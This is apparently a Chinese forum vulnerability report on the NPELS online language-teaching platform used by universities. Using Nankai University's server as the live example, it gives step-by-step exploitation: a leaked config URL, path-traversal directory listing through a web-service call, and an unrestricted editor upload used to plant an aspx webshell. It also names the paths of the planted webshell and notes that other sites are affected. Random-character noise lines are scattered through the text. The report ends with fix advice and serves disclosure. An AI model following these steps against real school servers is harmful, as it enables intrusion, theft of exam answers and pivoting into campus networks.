新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
, f: \8 }- t! f! s
  P" r2 p- q3 N" R& U) B详细说明：
3 e/ y7 F; K- i2 o9 S
% s/ N$ g2 }4 [! g1 C  w& p/ |以南开大学的为例:
http://222.30.60.3/NPELS
" p- |; |. m0 P4 v& ?) f$ jNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
0 y3 z3 [8 @7 {: ^7 ~8 a" e<setting name="Update_CommonSvr_CommonService" serializeAs="String">
! D  o/ m. t0 ~. `& i9 w<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
/ `5 i' j0 A( H) q7 w: c$ y<add key="TVersion" value="1, 0, 0, 2187">
</add>
/ o4 g6 i7 P' V% p2 ?# T直接访问
http://222.30.60.3/NPELS/CommonService.asmx
1 r3 C5 Y' j, T. o2 ^& J1 Q4 o& c使用GetTestClientFileList操作，直接 HTTP GET 列目录：
1 w, n! f! m& E! r$ G$ a  G/ K7 khttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
2 g) P$ A$ W! j! w' M! Y7 S3 Shttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
- K2 w! p9 C+ ?/ ~5 [上传后继续列目录找到木马地址直接访问即可

' Q- p4 ^& _5 x/ `$ V2 g5 Q7 d) ~OOXX
+ e2 t: p3 r% p
. R+ r* H7 J3 h9 l5 pGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
5 y! t  Y  D# A" J* s
列目录：
" E- K, l* W. [5 s* ]  v- Bhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
# M5 H2 q# C. w' ]; B& @http://222.30.60.3/npelsv/editor/editor.htm
  P: c! l! J+ c! S
0 K7 n% @* ^8 Z6 p' d上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
+ d4 P* e$ y0 r: T好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
- w) L2 L8 A7 V4 z# r2 _% |1 q" b并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​